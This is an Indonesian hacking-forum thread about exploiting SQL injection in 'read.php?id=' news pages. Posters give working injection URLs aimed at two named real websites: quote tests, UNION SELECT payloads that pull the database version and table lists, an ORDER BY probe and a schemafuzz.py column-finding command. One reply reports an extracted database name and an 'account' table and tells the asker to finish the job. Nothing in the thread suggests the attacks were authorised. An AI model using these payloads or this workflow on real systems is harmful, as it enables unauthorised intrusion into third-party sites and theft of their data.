[Bug] SQL injection pada News Read ID (read.php?)
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
Re: [Bug] SQL injection pada News Read ID (read.php?)
boleh disikat nih bos poni..........
............make a wish............
Re: [Bug] SQL injection pada News Read ID (read.php?)
:love: :love:shinichi81 wrote:boleh disikat nih bos poni..........
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
-
- Posts: 145
- Joined: Wed Apr 07, 2010 8:55 pm
Re: [Bug] SQL injection pada News Read ID (read.php?)
@om poni : om saya nyoba cek sqli di site ini :
trus pas saya cek versi mysqlnya ternyata versi 4,
saya coba cek isi tablenya,
eh malah keluar pesan, kayak gini :
apa yg mesti saya lakukan mas bila menghadapi hal seperti ini ? mohon pencerahannya
:kaca: :kaca: :kaca:
Code: Select all
http://www.wellerpools.com/news-read.php?id=16'
Code: Select all
http://www.wellerpools.com/news-read.php?id=-16%20union%20select%20all%201,version%28%29,3,4,5,6,7,8,9,10
Code: Select all
http://www.wellerpools.com/news-read.php?id=-16%20union%20select%20all%201,group_concat%28table_name%29,3,4,5,6,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Code: Select all
SELECT * FROM news WHERE news_id=-16 union select all 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
SELECT command denied to user 'main_wellerpools'@'72.167.232.226' for table 'tables'
:kaca: :kaca: :kaca:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
-
- Posts: 145
- Joined: Wed Apr 07, 2010 8:55 pm
Re: [Bug] SQL injection pada News Read ID (read.php?)
@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :
pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun
bingung saya mas
:pusing: :pusing: :pusing:
Code: Select all
http://campus.sanook.com/inlove/read.php?id=132'
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun
Code: Select all
http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000
:pusing: :pusing: :pusing:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
Re: [Bug] SQL injection pada News Read ID (read.php?)
kk coba pake schemafuzz.py untuk find jumlah columnnya.cyber_criminal wrote:@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?Code: Select all
http://campus.sanook.com/inlove/read.php?id=132'
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpunbingung saya masCode: Select all
http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000
:pusing: :pusing: :pusing:
Code: Select all
./schemafuzz.py --findcol -u "http://campus.sanook.com/inlove/read.php?id=132"
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
-
- Posts: 145
- Joined: Wed Apr 07, 2010 8:55 pm
Re: [Bug] SQL injection pada News Read ID (read.php?)
cara make schemafuzzy.py nya mcam mana om peniru ?
:circle: :circle: :circle:
:circle: :circle: :circle:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
Re: [Bug] SQL injection pada News Read ID (read.php?)
Database : learntolovecyber_criminal wrote:@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?Code: Select all
http://campus.sanook.com/inlove/read.php?id=132'
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpunbingung saya masCode: Select all
http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000
:pusing: :pusing: :pusing:
Table : account
sisanya lanjutkan sendiri
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
-
- Posts: 145
- Joined: Wed Apr 07, 2010 8:55 pm
Re: [Bug] SQL injection pada News Read ID (read.php?)
ok makasih om poni
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
- x3nophobi4
- Posts: 8
- Joined: Fri Jun 04, 2010 4:18 pm
- Location: [ Banten NKRI ]
- Contact:
Re: [Bug] SQL injection pada News Read ID (read.php?)
Mantep....dah...nyoba ah... :malumalu:
-- Brigade @l Bantani --
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
Re: [Bug] SQL injection pada News Read ID (read.php?)
pertama-tama instal dulu phyton,abis itu cari cmd...baru abis itu panggil tuh schemafuzzy.py :tapa: :tapa: :tapa:cyber_criminal wrote:cara make schemafuzzy.py nya mcam mana om peniru ?
:circle: :circle: :circle:
............make a wish............